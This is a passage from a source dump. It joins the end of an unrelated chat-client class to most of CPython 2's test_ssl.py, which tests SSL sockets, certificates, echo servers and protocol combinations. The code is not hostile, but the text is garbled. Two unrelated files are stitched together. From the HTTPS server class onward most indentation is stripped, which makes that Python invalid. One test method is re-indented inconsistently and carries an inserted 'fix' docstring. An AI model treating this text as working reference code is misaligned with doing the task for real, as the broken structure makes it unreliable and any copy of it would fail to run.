        :return: None
        """
        self.client_socket.send(bytes(msg, "utf8"))
        if msg == "{quit}":
            self.client_socket.close()

    def get_messages(self):
        """Atomically drain and return the buffered messages.

        :return: list[str]
        """
        # BUGFIX: copy and clear under the lock so a message appended by the
        # receiver thread between the copy and the reset is never lost.
        with self.lock:
            messages_copy = self.messages[:]
            self.messages = []
        return messages_copy

    def disconnect(self):
        """Tell the server we are leaving and close the connection."""
        self.send_message("{quit}")
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import test_support
import asyncore
import socket
import select
import time
import gc
import os
import errno
import pprint
import urllib, urlparse
import traceback
import weakref
import functools
import platform
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
# Import ssl via test_support so the whole test file is skipped cleanly
# when the interpreter was built without SSL support.
ssl = test_support.import_module("ssl")

HOST = test_support.HOST
# Certificate paths; populated before the suites run (None until then).
CERTFILE = None
SVN_PYTHON_ORG_ROOT_CERT = None
def handle_error(prefix):
    """Write the current exception, prefixed, to stdout in verbose mode."""
    exc_lines = traceback.format_exception(*sys.exc_info())
    exc_format = ' '.join(exc_lines)
    if test_support.verbose:
        sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
    # Smoke tests for the deprecated module-level SSL helpers.
    # NOTE: Python 2 'except IOError, e' syntax — this file targets 2.x.

    def test_sslwrap_simple(self):
        # A crude test for the legacy API
        try:
            ssl.sslwrap_simple(socket.socket(socket.AF_INET))
        except IOError, e:
            if e.errno == 32:  # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise
        try:
            ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
        except IOError, e:
            if e.errno == 32:  # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    # Decorator: skip *func* on Debian/Ubuntu builds whose patched OpenSSL
    # rejects SSLv2, which would otherwise fail the test spuriously.
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        # We need to access the lower-level wrapper in order to create an
        # implicit SSL context without trying to connect or listen.
        try:
            import _ssl
        except ImportError:
            # The returned function won't get executed, just ignore the error
            pass
        @functools.wraps(func)
        def f(*args, **kwargs):
            try:
                s = socket.socket(socket.AF_INET)
                _ssl.sslwrap(s._sock, 0, None, None,
                             ssl.CERT_NONE, ssl.PROTOCOL_SSLv2, None, None)
            except ssl.SSLError as e:
                # Skip only the known patched-OpenSSL failure signature.
                if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    platform.linux_distribution() == ('debian', 'squeeze/sid', '')
                    and 'Invalid SSL protocol variant specified' in str(e)):
                    raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
            return func(*args, **kwargs)
        return f
    else:
        return func
class BasicSocketTests(unittest.TestCase):
    # Local (mostly non-networked) sanity checks of the ssl module API.

    def test_constants(self):
        # Merely touch the constants to verify they are exported.
        #ssl.PROTOCOL_SSLv2
        ssl.PROTOCOL_SSLv23
        ssl.PROTOCOL_SSLv3
        ssl.PROTOCOL_TLSv1
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED

    def test_random(self):
        # RAND_* helpers are callable and type-check their arguments.
        v = ssl.RAND_status()
        if test_support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))
        self.assertRaises(TypeError, ssl.RAND_egd, 1)
        self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        ssl.RAND_add("this is a random string", 75.0)

    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE, False)
        if test_support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subject'],
                         ((('countryName', u'US'),),
                          (('stateOrProvinceName', u'Delaware'),),
                          (('localityName', u'Wilmington'),),
                          (('organizationName', u'Python Software Foundation'),),
                          (('organizationalUnitName', u'SSL'),),
                          (('commonName', u'somemachine.python.org'),)),
                         )
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if test_support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                         )

    def test_DER_to_PEM(self):
        # Round-trip a certificate through the PEM <-> DER converters.
        with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)

    def test_openssl_version(self):
        # The three version attributes must be present and self-consistent.
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, (int, long))
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 2.0
        self.assertLess(n, 0x20000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 2)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 26)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by OpenSSL, the format might change
        self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                        (s, t))

    def test_ciphers(self):
        # Cipher-string handling; requires the 'network' resource.
        if not test_support.is_resource_enabled('network'):
            return
        remote = ("svn.python.org", 443)
        with test_support.transient_internet(remote[0]):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="ALL")
            s.connect(remote)
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
            s.connect(remote)
            # Error checking occurs when connecting, because the SSL context
            # isn't created before.
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
            with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
                s.connect(remote)

    @test_support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        del ss
        self.assertEqual(wr(), None)

    def test_wrapped_unconnected(self):
        # The _delegate_methods in socket.py are correctly delegated to by an
        # unconnected SSLSocket, so they will raise a socket.error rather than
        # something unexpected like TypeError.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        self.assertRaises(socket.error, ss.recv, 1)
        self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
        self.assertRaises(socket.error, ss.recvfrom, 1)
        self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
        self.assertRaises(socket.error, ss.send, b'x')
        self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
class NetworkedTests(unittest.TestCase):
    # Client-side tests that connect to real hosts on the internet.

    def test_connect(self):
        # Exercise the three verification modes against a live server.
        with test_support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            s.connect(("svn.python.org", 443))
            c = s.getpeercert()
            if c:
                self.fail("Peer cert %s shouldn't be here!")
            s.close()
            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            try:
                s.connect(("svn.python.org", 443))
            except ssl.SSLError:
                pass
            finally:
                s.close()
            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                s.connect(("svn.python.org", 443))
            finally:
                s.close()

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with test_support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with test_support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex(('svn.python.org', 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLError as err:
                        if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                            select.select([s], [], [], 5.0)
                        elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                            select.select([], [s], [], 5.0)
                        else:
                            raise
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with test_support.transient_internet("svn.python.org"):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect(("svn.python.org", 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        # Drive the handshake manually on a non-blocking socket,
        # counting how many do_handshake() calls were needed.
        with test_support.transient_internet("svn.python.org"):
            s = socket.socket(socket.AF_INET)
            s.connect(("svn.python.org", 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            count = 0
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLError, err:
                    if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                        select.select([s], [], [])
                    elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                        select.select([], [s], [])
                    else:
                        raise
            s.close()
            if test_support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        # get_server_certificate() with and without a CA file.
        with test_support.transient_internet("svn.python.org"):
            pem = ssl.get_server_certificate(("svn.python.org", 443))
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")
            try:
                pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
            except ssl.SSLError:
                #should fail
                pass
            else:
                self.fail("Got server certificate %s for svn.python.org!" % pem)
            pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")
            if test_support.verbose:
                sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)

    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
        # SHA256 was added in OpenSSL 0.9.8
        if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
            self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
        # Unconditional skip below: the test is effectively disabled.
        self.skipTest("remote host needs SNI, only available on Python 3.2+")
        # NOTE: https://sha2.hboeck.de is another possible test host
        remote = ("sha256.tbs-internet.com", 443)
        sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
        with test_support.transient_internet("sha256.tbs-internet.com"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=sha256_cert,)
            try:
                s.connect(remote)
                if test_support.verbose:
                    sys.stdout.write("\nCipher with %r is %r\n" %
                                     (remote, s.cipher()))
                    sys.stdout.write("Certificate is:\n%s\n" %
                                     pprint.pformat(s.getpeercert()))
            finally:
                s.close()
# Optional threading support: the server-based tests below are only run
# when the interpreter was built with threads.
try:
    import threading
except ImportError:
    _have_threads = False
else:
    _have_threads = True
class ThreadedEchoServer(threading.Thread):
    # Lowercasing echo server running in its own thread; spawns one
    # ConnectionHandler thread per accepted client.

    class ConnectionHandler(threading.Thread):
        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock):
            self.server = server
            self.running = False
            self.sock = connsock
            self.sock.setblocking(1)
            self.sslconn = None
            threading.Thread.__init__(self)
            self.daemon = True

        def show_conn_details(self):
            # Log peer certificate and negotiated cipher when chatty.
            if self.server.certreqs == ssl.CERT_REQUIRED:
                cert = self.sslconn.getpeercert()
                if test_support.verbose and self.server.chatty:
                    sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                cert_binary = self.sslconn.getpeercert(True)
                if test_support.verbose and self.server.chatty:
                    sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
            cipher = self.sslconn.cipher()
            if test_support.verbose and self.server.chatty:
                sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")

        def wrap_conn(self):
            # Upgrade self.sock to TLS; on failure, record the error, tear
            # this handler down and stop the server so the harness notices.
            try:
                self.sslconn = ssl.wrap_socket(self.sock, server_side=True,
                                               certfile=self.server.certificate,
                                               ssl_version=self.server.protocol,
                                               ca_certs=self.server.cacerts,
                                               cert_reqs=self.server.certreqs,
                                               ciphers=self.server.ciphers)
            except ssl.SSLError as e:
                # XXX Various errors can have happened here, for example
                # a mismatching protocol version, an invalid certificate,
                # or a low-level bug. This should be made more discriminating.
                self.server.conn_errors.append(e)
                if self.server.chatty:
                    handle_error("\n server: bad connection attempt from " +
                                 str(self.sock.getpeername()) + ":\n")
                self.close()
                self.running = False
                self.server.stop()
                return False
            else:
                return True

        def read(self):
            # Read from whichever transport (TLS or plain) is active.
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            if self.sslconn:
                self.sslconn.close()
            else:
                # Close the underlying real socket (Python 2 _sock).
                self.sock._sock.close()

        def run(self):
            self.running = True
            if not self.server.starttls_server:
                if isinstance(self.sock, ssl.SSLSocket):
                    self.sslconn = self.sock
                elif not self.wrap_conn():
                    return
                self.show_conn_details()
            while self.running:
                try:
                    msg = self.read()
                    if not msg:
                        # eof, so quit this handler
                        self.running = False
                        self.close()
                    elif msg.strip() == 'over':
                        if test_support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif self.server.starttls_server and msg.strip() == 'STARTTLS':
                        if test_support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write("OK\n")
                        if not self.wrap_conn():
                            return
                    elif self.server.starttls_server and self.sslconn and msg.strip() == 'ENDTLS':
                        if test_support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write("OK\n")
                        self.sslconn.unwrap()
                        self.sslconn = None
                        if test_support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    else:
                        # Default behaviour: echo the message lowercased.
                        if (test_support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %s (%s), sending back %s (%s)...\n"
                                             % (repr(msg), ctype, repr(msg.lower()), ctype))
                        self.write(msg.lower())
                except ssl.SSLError:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 wrap_accepting_socket=False, ciphers=None):
        # Defaults match what most of the tests want.
        if ssl_version is None:
            ssl_version = ssl.PROTOCOL_TLSv1
        if certreqs is None:
            certreqs = ssl.CERT_NONE
        self.certificate = certificate
        self.protocol = ssl_version
        self.certreqs = certreqs
        self.cacerts = cacerts
        self.ciphers = ciphers
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.flag = None
        if wrap_accepting_socket:
            # Wrap the listening socket itself instead of each connection.
            self.sock = ssl.wrap_socket(self.sock, server_side=True,
                                        certfile=self.certificate,
                                        cert_reqs = self.certreqs,
                                        ca_certs = self.cacerts,
                                        ssl_version = self.protocol,
                                        ciphers = self.ciphers)
            if test_support.verbose and self.chatty:
                sys.stdout.write(' server: wrapped server socket as %s\n' % str(self.sock))
        self.port = test_support.bind_port(self.sock)
        self.active = False
        self.conn_errors = []
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Short accept timeout so self.active is re-checked regularly and
        # stop() takes effect promptly.
        self.sock.settimeout(0.05)
        self.sock.listen(5)
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if test_support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + str(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()

    def stop(self):
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    # asyncore-based TLS echo server wrapped in a thread.
    # NOTE: Python 2 'except ..., err' syntax — this file targets 2.x.

    class EchoServer(asyncore.dispatcher):

        class ConnectionHandler(asyncore.dispatcher_with_send):

            def __init__(self, conn, certfile):
                asyncore.dispatcher_with_send.__init__(self, conn)
                # Handshake is completed lazily from the event loop.
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                self._ssl_accepting = True

            def readable(self):
                # Drain data buffered inside the SSL layer before reporting
                # readiness to the asyncore loop.
                if isinstance(self.socket, ssl.SSLSocket):
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True

            def _do_ssl_handshake(self):
                try:
                    self.socket.do_handshake()
                except ssl.SSLError, err:
                    if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                       ssl.SSL_ERROR_WANT_WRITE):
                        return
                    elif err.args[0] == ssl.SSL_ERROR_EOF:
                        return self.handle_close()
                    raise
                except socket.error, err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    self._ssl_accepting = False

            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    data = self.recv(1024)
                    if data and data.strip() != 'over':
                        self.send(data.lower())

            def handle_close(self):
                self.close()
                if test_support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)

            def handle_error(self):
                raise

        def __init__(self, certfile):
            self.certfile = certfile
            asyncore.dispatcher.__init__(self)
            self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = test_support.bind_port(self.socket)
            self.listen(5)

        def handle_accept(self):
            sock_obj, addr = self.accept()
            if test_support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)

        def handle_error(self):
            raise

    def __init__(self, certfile):
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True

    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)

    def __enter__(self):
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        if test_support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if test_support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if test_support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            # Short loop timeout so stop() takes effect promptly.
            asyncore.loop(0.05)

    def stop(self):
        self.active = False
        self.server.close()
# Thread that serves files over HTTPS using the SocketServer-based
# HTTPServer machinery (Python 2 stdlib names: urllib.unquote etc.).
class SocketServerHTTPSServer(threading.Thread):
class HTTPSServer(HTTPServer):
def __init__(self, server_address, RequestHandlerClass, certfile):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
# we assume the certfile contains both private key and certificate
self.certfile = certfile
self.allow_reuse_address = True
def __str__(self):
return ('<%s %s:%s>' %
(self.__class__.__name__,
self.server_name,
self.server_port))
def get_request(self):
# override this to wrap socket with SSL
sock, addr = self.socket.accept()
sslconn = ssl.wrap_socket(sock, server_side=True,
certfile=self.certfile)
return sslconn, addr
class RootedHTTPRequestHandler(SimpleHTTPRequestHandler):
# need to override translate_path to get a known root,
# instead of using os.curdir, since the test could be
# run from anywhere
server_version = "TestHTTPS/1.0"
root = None
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = urlparse.urlparse(path)[2]
path = os.path.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
# NOTE(review): substring test against self.root looks intended to
# drop components already in the root path -- verify against caller.
if word in self.root: continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
# we override this to suppress logging unless "verbose"
if test_support.verbose:
sys.stdout.write(" server (%s:%d %s):\n [%s] %s\n" %
(self.server.server_address,
self.server.server_port,
self.request.cipher(),
self.log_date_time_string(),
format%args))
def __init__(self, certfile):
self.flag = None
# Serve files from the directory that holds the certificate.
self.RootedHTTPRequestHandler.root = os.path.split(CERTFILE)[0]
self.server = self.HTTPSServer(
(HOST, 0), self.RootedHTTPRequestHandler, certfile)
self.port = self.server.server_port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
if self.flag:
self.flag.set()
self.server.serve_forever(0.05)
def stop(self):
self.server.shutdown()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False)
with server:
try:
s = ssl.wrap_socket(socket.socket(),
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError, x:
if test_support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x[1])
except socket.error, x:
if test_support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x[1])
else:
# No exception: the handshake wrongly accepted the bad cert.
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(certfile, protocol, certreqs, cacertsfile,
client_certfile, client_protocol=None, indata="FOO\n",
ciphers=None, chatty=True, connectionchatty=False,
wrap_accepting_socket=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(certfile,
certreqs=certreqs,
ssl_version=protocol,
cacerts=cacertsfile,
ciphers=ciphers,
chatty=chatty,
connectionchatty=connectionchatty,
wrap_accepting_socket=wrap_accepting_socket)
with server:
# try to connect
if client_protocol is None:
client_protocol = protocol
s = ssl.wrap_socket(socket.socket(),
certfile=client_certfile,
ca_certs=cacertsfile,
ciphers=ciphers,
cert_reqs=certreqs,
ssl_version=client_protocol)
s.connect((HOST, server.port))
# Exercise str, bytearray and memoryview payloads; the echo server
# replies with the lower-cased data.
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(arg)))
s.write(arg)
outdata = s.read()
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
raise AssertionError(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
# "over" is the sentinel the echo server stops echoing on.
s.write("over\n")
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
# Run server_params_test with a (server protocol, client protocol) pair and
# assert that the handshake succeeds or fails as *expect_success* predicts.
def try_protocol_combo(server_protocol,
client_protocol,
expect_success,
certsreqs=None):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if test_support.verbose:
# Braces in the format mark combos expected to fail.
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
try:
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
server_params_test(CERTFILE, server_protocol, certsreqs,
CERTFILE, CERTFILE, client_protocol,
ciphers="ALL", chatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = test_support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
s.accept()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
c = socket.socket()
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_TLSv1, ssl.CERT_NONE,
CERTFILE, CERTFILE, ssl.PROTOCOL_TLSv1,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
    """Connect with CERT_REQUIRED and sanity-check the peer certificate.

    Fix: the original created a stray ``s2 = socket.socket()`` that was
    never used or closed -- a file-descriptor leak per test run. It is
    removed; everything else is unchanged.
    """
    if test_support.verbose:
        sys.stdout.write("\n")
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_SSLv23,
                                cacerts=CERTFILE,
                                chatty=False)
    with server:
        s = ssl.wrap_socket(socket.socket(),
                            certfile=CERTFILE,
                            ca_certs=CERTFILE,
                            cert_reqs=ssl.CERT_REQUIRED,
                            ssl_version=ssl.PROTOCOL_SSLv23)
        s.connect((HOST, server.port))
        cert = s.getpeercert()
        self.assertTrue(cert, "Can't get peer certificate.")
        cipher = s.cipher()
        if test_support.verbose:
            sys.stdout.write(pprint.pformat(cert) + '\n')
            sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
        if 'subject' not in cert:
            self.fail("No subject field in certificate: %s." %
                      pprint.pformat(cert))
        if ((('organizationName', 'Python Software Foundation'),)
                not in cert['subject']):
            self.fail(
                "Missing or invalid 'organizationName' field in certificate subject; "
                "should be 'Python Software Foundation'.")
        s.close()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
